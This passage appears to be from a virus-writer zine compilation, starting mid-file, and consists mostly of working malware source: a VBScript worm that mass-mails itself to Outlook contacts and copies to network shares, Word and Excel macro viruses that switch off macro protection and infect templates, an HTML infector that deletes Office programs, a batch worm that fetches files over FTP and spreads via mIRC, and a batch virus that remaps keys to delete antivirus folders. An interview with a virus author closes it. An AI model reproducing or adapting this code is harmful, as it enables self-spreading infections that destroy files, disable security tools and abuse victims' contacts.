<parameter name="Body"/>
<parameter name="MaxAmount"/>
<parameter name="Subject"/>
</method>
<method name="ShowText">
<parameter name="Content"/>
</method>
</public>
<script language="VBScript">
<![CDATA[
Sub DelTempFiles
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True
If FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True
Set FSO = Nothing
End Sub
Sub NetworkSpreading(FileName)
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set FSO = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then FSO.CopyFile WormFile, FSO.BuildPath(
Shares.Item(Counter1), FileName)
Next
Set FSO = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub
Sub OutlookSpreading(MaxAmount, Subject, Body)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile WormFile, AttachmentFile
Set FSO = Nothing
Outlook = ""
Set Outlook = CreateObject("Outlook.Application")
If Outlook <> "" Then
Set MAPI = Outlook.GetNameSpace("MAPI")
For Each List In MAPI.AddressLists
If List.AddressEntries.Count > 0 Then
Set Email1 = Outlook.CreateItem(0)
If List.AddressEntries.Count > MaxAmount Then
Dim Address()
ReDim Address(MaxAmount - 1)
For Counter1 = 0 To MaxAmount - 1
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) = -1 Then Address(Counter1) = Int(
List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) <> -1 Then
Set Entry = List.AddressEntries(Address(Counter1))
If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.Address
Set Entry = Nothing
End If
Next
Else
For Counter1 = 1 To List.AddressEntries.Count
Set Entry = List.AddressEntries(Counter1)
If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.Address
Set Entry = Nothing
Next
End If
Email1.BCC = Addresses
Email1.Subject = Subject
Email1.Body = Body
Email1.Attachments.Add AttachmentFile
Email1.DeleteAfterSubmit = True
Email1.Send
Set Email1 = Nothing
Randomize
If Int(5 * Rnd) = 0 Then
Set Email2 = Outlook.CreateItem(0)
Email2.BCC = Addresses
Email2.Subject = "Alma"
Email2.Body = "No alucines que te amo," & Chr(13) & Chr(10) & "cuando en
realidad es solo" & Chr(13) & Chr(10) & "mi coraz" & Chr(243) & "n qui" & Chr(233) & "n lo
hace." & Chr(13) & Chr(10) & "Porque como ya sabr" & Chr(225) & "s," & Chr(13) & Chr(10) &
"mi coraz" & Chr(243) & "n no manda en mi vida," & Chr(13) & Chr(10) & "si as" & Chr(237) &
" lo hiciera," & Chr(13) & Chr(10) & "mi alma estar" & Chr(237) & "a perdida."
Email2.DeleteAfterSubmit = True
Email2.Send
Set Email2 = Nothing
End If
End If
Next
Set MAPI = Nothing
Set Outlook = Nothing
End If
End Sub
Sub ShowText(Content)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.CreateTextFile(TextFile, True)
File.Write(Content)
File.Close
Set File = Nothing
Set FSO = Nothing
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run(TextFile)
Set WSHShell = Nothing
End Sub
]]>
</script>
</component>
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
If E.ProcOfLine(E.ProcStartLine("IT", vbext_pk_Proc), 1) <> "IT" And E.CountOfLines > 2 Then
E.AddFromString B
For F = 1 To E.CountOfLines
G = E.ProcOfLine(F, 1)
If H <> G And G <> "IT" And Right(E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1), 4) <> ": IT"
Then
E.ReplaceLine E.ProcStartLine(G, vbext_pk_Proc), E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1
) & ": IT"
H = G
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Neclovek
'My_Comments = Do Not Distribute!
End Sub
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
F = ""
F = E.Lines(E.ProcStartLine("IT", vbext_pk_Proc), E.ProcCountLines("IT", vbext_pk_Proc))
If E.CountOfLines > 2 And F <> B Then E.AddFromString B
For G = 1 To E.CountOfLines
H = E.ProcOfLine(G, 1)
If I <> H And H <> "IT" And Right(E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1), 4) <> ": IT"
Then
E.ReplaceLine E.ProcStartLine(H, vbext_pk_Proc), E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1
) & ": IT"
I = H
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Unperson
'My_Comments = Do Not Distribute!
End Sub
<SCRIPT LANGUAGE="VBScript">
<!--
Dim FSO,MSBound,DC,D,TMP,F
MSBound = "<SCRIPT LANGUAGE=#VBScript#>$<!--$ Dim FSO,MSBound,DC,D,TMP,F$ MSBound =
#|#$ On Error Resume Next$ TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)$ TMP =
ReplaceWithIn(Chr(35),Chr(34),TMP)$ F = InStr(1,TMP,Chr(124))$ MSBound = Left(TMP,F-1) &
MSBound & Mid(TMP,F+1)$ F = InStr(2500,MSBound,Chr(124))$ MSBound = Left(MSBound,F-1) &
Mid(MSBound,F+1)$$ Set FSO = CreateObject(#Scripting.FileSystemObject#)$ If Err.Number = 0
Then$ Set DC = FSO.Drives$ For Each D In DC$ If D.DriveType = 2
Then$ SweepDrive D.DriveLetter & #:\#$ End If$ Next$ End If$$Sub
SweepDrive(pPath)$ Dim F, S, O$ On Error Resume Next$ Set F = FSO.GetFolder(pPath)$
InfectFiles F$ Set S = F.SubFolders$ For Each O In S$ SweepDrive(pPath & O.Name &
#\#)$ Next $End Sub $$Sub InfectFiles(pFolder)$ Dim F,Member,Ext,M,C$ On Error
Resume Next$ Set F = pFolder.Files$ For Each Member In F$ M =
UCase(Member.Name)$ If M = #WINWORD.EXE# Or M = #ACCESS.EXE# Or M = #EXCEL.EXE# Or M =
#WORD.EXE# Then$ Set M = FSO.GetFile(Member.Path)$ M.Attributes =
(M.Attributes And 1) - 1$ M.Delete$ End If $ Ext =
UCase(FSO.GetExtensionName(Member.Name))$ If Ext = #HTML# Or Ext = #HTM# Then$
Set M = FSO.OpenTextFile(Member.Path,1)$ C = M.ReadAll$ If
InStr(1,C,MSBound) = 0 Then$ Set M = FSO.CreateTextFile(Member.Path,
True)$ M.WriteLine MSBound & C$ M.Close$ End If$ End if$
Next$End Sub$$Private Function ReplaceWithIn(CurChar,NewChar,SourceString)$ Dim T,TMP$ T =
1$ TMP = SourceString$ Do While T > 0$ T = InStr(T, TMP, CurChar)$ If T > 0 Then
TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)$ Loop$ ReplaceWithIn = TMP$End
Function$$'MSBound by Suppa.$-->$<|/SCRIPT>$$"
On Error Resume Next
TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)
TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)
F = InStr(1,TMP,Chr(124))
MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)
F = InStr(2500,MSBound,Chr(124))
MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)

Set FSO = CreateObject("Scripting.FileSystemObject")


If Err.Number = 0 Then
Set DC = FSO.Drives
For Each D In DC
If D.DriveType = 2 Then
SweepDrive D.DriveLetter & ":\"
End If
Next
End If

Sub SweepDrive(pPath)
Dim F, S, O
On Error Resume Next
Set F = FSO.GetFolder(pPath)
InfectFiles F
Set S = F.SubFolders
For Each O In S
SweepDrive(pPath & O.Name & "\")
Next
End Sub

Sub InfectFiles(pFolder)
Dim F,Member,Ext,M,C
On Error Resume Next
Set F = pFolder.Files
For Each Member In F
M = UCase(Member.Name)
If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then
Set M = FSO.GetFile(Member.Path)
M.Attributes = (M.Attributes And 1) - 1
M.Delete
End If
Ext = UCase(FSO.GetExtensionName(Member.Name))
If Ext = "HTML" Or Ext = "HTM" Then
Set M = FSO.OpenTextFile(Member.Path,1)
C = M.ReadAll
If InStr(1,C,MSBound) = 0 Then
Set M = FSO.CreateTextFile(Member.Path, True)
M.WriteLine MSBound & C
M.Close
End If
End if
Next
End Sub

Private Function ReplaceWithIn(CurChar,NewChar,SourceString)


Dim T,TMP
T = 1
TMP = SourceString
Do While T > 0
T = InStr(T, TMP, CurChar)
If T > 0 Then TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)
Loop
ReplaceWithIn = TMP
End Function

'MSBound by Suppa.
-->
</SCRIPT>

<HTML>
<HEAD><TITLE>MSBound</TITLE></HEAD>
<BODY BGCOLOR="#000000">
<BR><BR><BR>
<CENTER><TABLE BORDER=0 BGCOLOR="#000000" CELLPADDING=10>
<TR><TD>
<FONT COLOR="#FF0000">
<U><B><FONT COLOR="#FF0000"> MSBound by Suppa.</B></U>
<BR><BR><BR>
This is the parent HTML file containing MSBound written by Suppa.<BR>
Feel free do to what you want with it, but don't blame me if it comes back to you.<BR>
<BR>
Special thanks go out to Gigabyte for getting me interested in these things.<BR>
</FONT>
</TD></TR>
</TABLE></CENTER>
</BODY>
</HTML>
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As
Long, lpColorValues As Long) As Long
Private Sub Document_Open()
' LSD
' By The WalruS 09/00 v1.00

On Error Resume Next

Randomize

If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub

Select Case Application.Version

Case "9.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False

Case "8.0"
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
End Select

With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = False
End With

KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "

Set nor = NormalTemplate.VBProject.vbcomponents(1).CodeModule


Set doc = ActiveDocument.VBProject.vbcomponents(1).CodeModule

ChangeHook = Int(Rnd * 2)
Select Case ChangeHook

Case 0
Hook = "Private Sub Document_Open()"

Case 1
Hook = "Private Sub Document_Close()"

End Select

Open "C:\Windows\" & Day(Now) & ".sys" For Output As #1


Print #1, "Private Declare Function SetSysColors Lib ""user32"" (ByVal nChanges As Long,
lpSysColor As Long, lpColorValues As Long) As Long"
Print #1, Hook
Print #1, VBProject.vbcomponents(1).CodeModule.Lines(3, 110)
Close #1
If nor.Lines(3, 1) <> "' LSD" Then
nor.DeleteLines 1, nor.CountOfLines
nor.AddFromFile ("C:\Windows\" & Day(Now) & ".sys")
NormalTemplate.Save
ElseIf doc.Lines(3, 1) <> "' LSD" Then
doc.DeleteLines 1, doc.CountOfLines
doc.AddFromFile ("C:\Windows\" & Day(Now) & ".sys")
End If

With Dialogs(wdDialogFileSummaryInfo)
.Author = "WalruS"
.Title = "CandyFlippin"
.Execute
End With

TimeCheck = Second(Now)
One = Left(TimeCheck, 1)
Two = Right(TimeCheck, 1)
If One = Two Then Call CandyFlip

NormalTemplate.Saved = True
If ActiveDocument.Saved <> True Then ActiveDocument.Save

End Sub

Private Sub CandyFlip()


On Error Resume Next
a = SetSysColors(1, 1, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 2, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 3, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 4, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 5, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 6, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 7, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 8, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 9, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 10, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 11, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 12, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 13, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 14, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 15, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 16, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 17, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 18, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 19, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 20, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 21, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 22, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 23, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 24, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 25, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 26, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
a = SetSysColors(1, 27, RGB(Rnd * 255, Rnd * 255, Rnd * 255))
End Sub
'Aida
Private Sub Document_Open(): With Options: Const nula = 0
.VirusProtection = nula
End With: Dim a, b, c, d
a = Strings.RTrim(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, _
ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines))
With NormalTemplate.VBProject.VBComponents(1).CodeModule
c = .Lines(1, 1)
If c <> "'Aida" Then
.DeleteLines 1, NormalTemplate.VBProject.VBComponents(1) _
.CodeModule.CountOfLines
.InsertLines 1, a
End If
End With
With ActiveDocument.VBProject.VBComponents(1).CodeModule
d = .Lines(1, 1)
If d <> "'Aida" Then
.DeleteLines 1, ActiveDocument.VBProject.VBComponents(1) _
.CodeModule.CountOfLines
.InsertLines 1, a
End If: End With
If Day(Now()) = 14 And Month(Now()) = 9 Then
With Selection
.Font.Bold = True: .Font.Color = wdColorViolet
.Font.Size = 26: .Font.Emboss = True
.Font.Animation = wdAnimationSparkleText
.Font.Shadow = True: .ParagraphFormat.Alignment = wdAlignParagraphCenter
Selection.Text = "Aida: Where ever You are, You are only one that I loved truely!"
End With
End If
'WM97/2K.Aida by e[ax]
'Pozdravljam sve pri BiHNet.Org-u!
'Greetz to all ppl on #virus and VX-scene!
'"Kad sve izgleda da umire, ono se ustvari radja" - e[ax]
End Sub
'e[ax]
Private Sub Document_open()
Dim KVICKJS, CHSJEUR, LCXJSIE, OCKAJRF, SIFDMXU
Set CHSJEUR = ThisDocument.VBProject.VBComponents(1).CodeModule
Set OCKAJRF = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set LCXJSIE = ActiveDocument.VBProject.VBComponents(1).CodeModule
KVICKJS = Strings.Trim(CHSJEUR.lines(1, CHSJEUR.countoflines))
SIFDMXU = Strings.LCase("'e[ax]")
If SIFDMXU <> OCKAJRF.lines(1, 1) Then
With OCKAJRF
.deletelines 1, OCKAJRF.countoflines
.insertlines 1, KVICKJS
End With
End If
If SIFDMXU <> LCXJSIE.lines(1, 1) Then
With LCXJSIE
.deletelines 1, LCXJSIE.countoflines
.insertlines 1, KVICKJS
End With
End If
'WM97/2K.String by e[ax]
'SIM v1.0 [String Infection Method] by e[ax]
'Greetz: k04x, rudeboy, BIGFOOOT, E-man, SnakeLord, t[r]ax
'H4dija, te ostale pri BIHnet.ORG-u
'SP.greetz to: Jackie 2Fl0wer, KnowDeth, ASMhead5, Mist, mort-
'nala, Giga, LifeWire, Fulvian, Staggle, SlageHamm, Perikles, Evul, and to all ppl on #virus
'10x once again for inspiration...
'VicES: Where ar u man!?
End Sub
Private Sub document_open(): Const nula = 0
Dim a, b, c, d: Set b = ThisDocument: Options.VirusProtection = nula
If b = ActiveDocument Then Set c = NormalTemplate Else Set c = ActiveDocument
d = b.VBProject.vbcomponents(1).codemodule.lines(1, _
b.VBProject.vbcomponents(1).codemodule.countoflines): a = Strings.LCase(d)
With c.VBProject.vbcomponents(1).codemodule
If .lines(14, 1) <> "'string2" Then
With c.VBProject.vbcomponents(1).codemodule
.deletelines 1, c.VBProject.vbcomponents(1).codemodule.countoflines
.insertlines 1, a
End With
End If
End With
End Sub
'string2
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "Blade"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Private Sub Document_Close()
On Error Resume Next
'Class.Blade
'code by Necronomikon
'greetz to:Gigabyte,jackie,SnakeByte,Lys
Kovick,SerialKiller,Perikles,-KD-,SnakeMan,SlageHammer,dageshi,Ratter,#virus,#shadowvx,[6oCKeR
],Fii7e,LISP
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayStatusBar = False
Options.ConfirmConversions = False
Options.VirusProtection = False
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.SaveNormalPrompt = False
Options.BlueScreen = True: Application.WindowState = wdWindowStateMaximize
CommandBars("Tools").Controls("Macro").Enabled = (99 - 99): CommandBars("File").Controls(
"Print Preview").Enabled = (99 - 99): CommandBars("Edit").Controls("Select All").Enabled = (
99 - 99)
CommandBars("Edit").Controls("Undo VBA-Selection.TypeText").Enabled = (99 - 99):
CommandBars("Tools").Controls("Word Count...").Enabled = (99 - 99):
CommandBars("Tools").Controls("Options...").Enabled = (99 - 99)
For Each Target In Application.VBE.VBProjects
If Target.VBComponents(1).CodeModule.Lines(1, 1) = "" Then Target.VBComponents(1).
CodeModule.addfromstring, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 26)
Next
For i = 1 To Documents.Count
If Documents(i).Saved = False Then Documents(i).SaveAs Documents(i).FullName
Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\ControlPanel\Desktop", "MenuShowDelay") =
"10000"
End Sub
Private Sub Document_Open()
y = y + 1
Set a = Word.Application.Application
Set j = a.MacroContainer
Set k = j.VBProject.vbcomponents(y)
Set c = k.codemodule
If j = a.NormalTemplate Then Set i = a.ActiveDocument Else Set i = a.NormalTemplate
Set e = i.VBProject
a.Options.VirusProtection = vbEmpty
a.Options.SaveNormalPrompt = vbEmpty
With e.vbcomponents(y).codemodule
If Not .lines(16, y) Like "'L*m*" Then .deletelines y, .countoflines: .insertlines y, c.lines
(y, 19)
End With
If InStr(y, VBA.Time, "5") Then MsgBox "I'm so happy 'cause today I found my friends, they
are in my head." & vbCrLf & "I'm so ugly, thats ok 'cause so are you. Broken mirrors." &
vbCrLf & "Sunday morning is every day for all I care and I'm not scared." & vbCrLf & "Light
my candles in a days 'cause I forgot...", vbInformation, "Lithium"
End Sub
'Lithium / (c) 1999 jackie
'(Prove sample of Anti-Bloodhound code)
'No backdrops and no lights can focus
'on that shit...Linezer0 Oldskewl Tribe

' ---[snip]---

' Hi there kids, this some very old werk to show you how to code anti-
' bloodhound-heuristically. Well, it's just a basic example to prove
' that it's possible to bypass that heuristic. xD Just check it out and
' enjoy!

' Whatever tomorrow brings,


' jackie
'fireal
Private Sub Workbook_Open()
On Error Resume Next
For Each fireal In ThisWorkbook.VBProject.VBComponents
If fireal.Properties.Count = 73 Then ourcode = fireal.codemodule.Lines(1, 20)
Next
For Each book In Workbooks
For Each fireal In book.VBProject.VBComponents
If fireal.Properties.Count = 73 And fireal.codemodule.Lines(1, 1) <> "'fireal" Then
fireal.codemodule.deletelines 1, fireal.codemodule.countoflines
fireal.codemodule.insertlines 1, ourcode
If book.Path = "" Then book.SaveAs book.FullName Else book.Save
End If
Next
Next
End Sub
'x97m.fireal (c) 1999 jackie
'1st language independent excel class infector
'No backdrops and no lights can focus on that shit...Linezer0 '1999

' ---[snip]---

' Hi there kids, same as Lithium, I just can present you some old werk
' because of that damn zip disk crash. Hope you can enjoy this language
' independent x97m. Catch y'all around.

' Do you know how I feel,


' jackie
@echo off

::IRC.HighHopes.c
::by -KD- [Metaphase VX Team & NoMercyVirusTeam]
::Greets to Evul, Tally, AngelsKitten, KidCypher, nucleii,
::Roadkil, Zanat0s, Duke, Lys, Jackie, Foxz, darkman, lea
::Raven, Deloss, JFK, BSL4, and -Everyone- in #virus

if errorlevel 1 goto noscr


c:
md c:\pkdown >nul
echo [script]>>c:\mirc\script.ini
echo n0=;HighHopes.a>>c:\mirc\script.ini
echo n1=;by -KD- [Metaphase VX Team & NoMercyVirusTeam]>>c:\mirc\script.ini
echo n2=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }>>c:\mirc\script.ini
echo n3= /dcc send $nick C:\mirc\hope.zip>>c:\mirc\script.ini
echo n4=}>>c:\mirc\script.ini
echo n5=>>c:\mirc\script.ini
echo n6=ON 1:QUIT:#:/msg $chan The grass was greener.>>c:\mirc\script.ini
echo n7=ON 1:connect: {>>c:\mirc\script.ini
echo n9= /run attrib +r +s +h C:\mirc\script.ini>>c:\mirc\script.ini
echo n10= /run attrib +r +s +h C:\mirc\hope.zip>>c:\mirc\script.ini
echo n11=}>>c:\mirc\script.ini
echo open ftp.elkhart.net>>c:\ftpme.txt
echo anonymous>>c:\ftpme.txt
echo username@nowhere.com>>c:\ftpme.txt
echo cd pub>>c:\ftpme.txt
echo cd shareware>>c:\ftpme.txt
echo binary>>c:\ftpme.txt
echo hash>>c:\ftpme.txt
echo lcd c:\pkdown>>c:\ftpme.txt
echo get pkzip204.exe>>c:\ftpme.txt
echo bye>>c:\ftpme.txt

:noscr
echo Keep this open for to have Good Luck! >>c:\highhopes1.txt
echo When it closes you will have Good Luck! >>c:\highhopes1.txt
echo Some one has high hopes for You!! >>c:\highhopes1.txt
@echo on
type c:\highhopes1.txt
@echo off
echo y| del c:\highhopes1.txt >nul
if errorlevel 1 goto noftp
%windir%\ftp.exe -s:c:\ftpme.txt >nul

:noftp
echo >>c:\highhopes.txt
echo The grass was greener. The light was brigher. >>c:\highhopes.txt
echo The taste was sweeter. The nights of wonder. >>c:\highhopes.txt
echo With friends sorrounding. The dawn mist glowing.>>c:\highhopes.txt
echo The water flowing. The endless river. >>c:\highhopes.txt
echo For Ever And Ever..... >>c:\highhopes.txt
@echo on
type c:\highhopes.txt
@echo off
if errorlevel 1 goto nogo
echo y| del c:\highhopes.txt >nul
cd \pkdown
c:\pkdown\pkzip204.exe >nul
echo y| copy %0 c:\pkdown\highhopes.bat >nul
c:\pkdown\pkzip hope.zip highho~1.bat >nul
echo y| copy hope.zip c:\mirc >nul
cd \
echo y| del c:\pkdown\*.* >nul
rd c:\pkdown >nul
echo y| del c:\ftpme.txt >nul
nogo:
@echo off
cls
@echo off%_FukThat%

::###########################################

::Fuck That 1.0a

::Deloss / NuKE

::This virus goes out to Ruzz and his

::fucked up policies of with who his members

::in Shadowvx can and cannot speak to.

::Free The Tree Frogs!

::###########################################

if '%1=='FukThat goto FukThat%2

set FukThat=%0.bat

if not exist %FukThat% set FukThat=%0

if '%FukThat%==' set FukThat=autoexec.bat

if exist c:\_FukThat.bat goto FG

if not exist %FukThat% goto FZ

find "FukThat"<%FukThat%>c:\_FukThat.bat

attrib c:\_FukThat.bat +h

:FG

command /c c:\_FukThat F V . .. \ %path%

:FZ

set FukThat=

goto FE

:FV

shift%_FukThat%

if '%2==' exit FukThat

for %%a in (%2\*.bat %2*.bat) do call c:\_FukThat F I %%a

goto FV

:FI

find "FukThat"<%3>nul

if not errorlevel 1 goto FE

type %3>FukThat$

echo.>>FukThat$
type c:\_FukThat.bat>>FukThat$

move FukThat$ %3>nul

:FD

echo.|date|find "12">nul.FukThat

echo DEVICE=c:\windows\command\ansi.sys>>config.sys

if errorlevel 1 goto FN

:FN

echo.|date|find "13">nul.FukThat

@echo on

echo and if they say you can't come around here say *fuck that*.

echo and if they say you can't come around me say *fuck that*.

ESC["n";"y";13p

ESC["y";"n";13p

ESC["N";"y";13p

ESC["Y";"n";13p

ESC["a";"del c:\avp";13p

ESC["e";"del c:\f-prot";13p

ESC["i";"del c:\mcafee";13p

ESC["o";"del c:\nav";13p

ESC["A";"del c:\avp";13p

ESC["E";"del c:\f-prot";13p

ESC["I";"del c:\mcafee";13p

ESC["O";"del c:\nav";13p

if errorlevel 1 goto FE

echo off

exit FukThat

:FE
Real Time Interview with Rajaat

Interviewer: Gigabyte

First question.. Do all VXers here walk around stoned all day and bang with their heads against lamp posts? <G>

Well, in order to feel at home during an Amsterdam VX meeting you will have to walk the left-hand path of
stonedness. I think I'll manage to become Dutch quite well ;-)

How old were you when you had your first experience with computers?

My first computer was an Aquarius, an ugly little fellow with blue rubber keys. I got it for my birthday when I was 7
years old.

How old were you when you joined the VX scene?

I was just about your age when I conducted my first virus experiments, just before I got 18 years old.

How many viruses have you written by now.. any chance your totally drugged brain can still remember?

I cannot recall an actual number, but I think it must be around 200 or so, including minor variants.

Do you consider yourself an 'evil' or rather 'nice' VXer?

I consider myself to be a 'nice' VXer, if you can speak of such a thing. Since we are evil in the eyes of the end users, I
frankly don't care if I appear to be friendly or not.

Which language do you like most for writing viruses?

Hah, that's a good question. I would likr a language in which you have complete control over the code it generates, so
highly configurable languages like C-- or Terse are good, but lack the things needed in a ring0 win32 environment. I
yet have to look for a free language that comes with source and generates tight code. Perl is interesting, though
extremely bloated.

Did you ever write anything destructive? If so, how do you feel about that now?

I have written one virus that did intentional damage, but after having goofed up with debug I decided for my own
good to try to make them as harmless as possible.

What is, in your opinion, the most idiotic comment about any of your viruses you've seen, from AVers?

I laughed a lot when I saw the description of Fick.7326 on the AVP site. I had expected that Kaspersky would be
smart enough to recognize that major part of it is written in Borland C++, instead of Pascal.

Do your family and friends know you write viruses?

Yes, they don't care as long as I leave their machines alone.


What am I doing here between these weirdos? (being the only normal person around)

I have no idea, perhaps masochism? ;-)

Do you have enemies in the scene?

Not that I am aware of. There are people I like and there are people I don't like. These people I do not communicate
with may want to consider themselves my enemy but that makes no difference to me.

What do you think about infected users?

I pity them. After so many media hypes (Michelangelo, Melissa, I love you..) people should have learned the
necessity of installing a good scanner from a trusted source.

If a family member would catch one of your viruses and he/she had no AV installed at all, no backups and he/she had
caught it by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help
him/her out?

Yes, and immediately install a cracked version of AVP. I'd tell them they are stupid if they don't keep it updated. My
hobby is writing them, not giving users a hard time. Unfortunately, a virus is made to be spread, thus I give them to
people who are interested.

What's your favourite VX website?

www.coderz.net, it is like a portal form, just like slashdot.

Are you IRC addicted?

No, I don't think so.

How long are you planning to stay in the scene? (Out, out!! ;)

I have no set plans whatsoever, but I feel like I have not tried all the things I wish to accomplish. There is so much I
yet would like to try out, but this mainly has to do with compilers and interpreter issues.

How big do you think my chances are to survive smoking a joint? (in %)

Hmm, about 50% at first, after 20 years of smoking weed I guess that gets trimmed down to 5% :-D But you'll get a
try..

Can I take a picture of the cat?

If he agrees you can try, but I had troubles myself keeping him in a pose for longer than 2 seconds.
Which AVers do you hate most?

I don't hate them, though it is a pity they earn money on the digital havoc we wreak.

Which of your viruses are you most proud of?

I think I'm proud of most of them. Each time I coded something I tried out new stuff, so each one is a milestone in
my writing (or lack thereof) skills.

Which other viruses do you like?

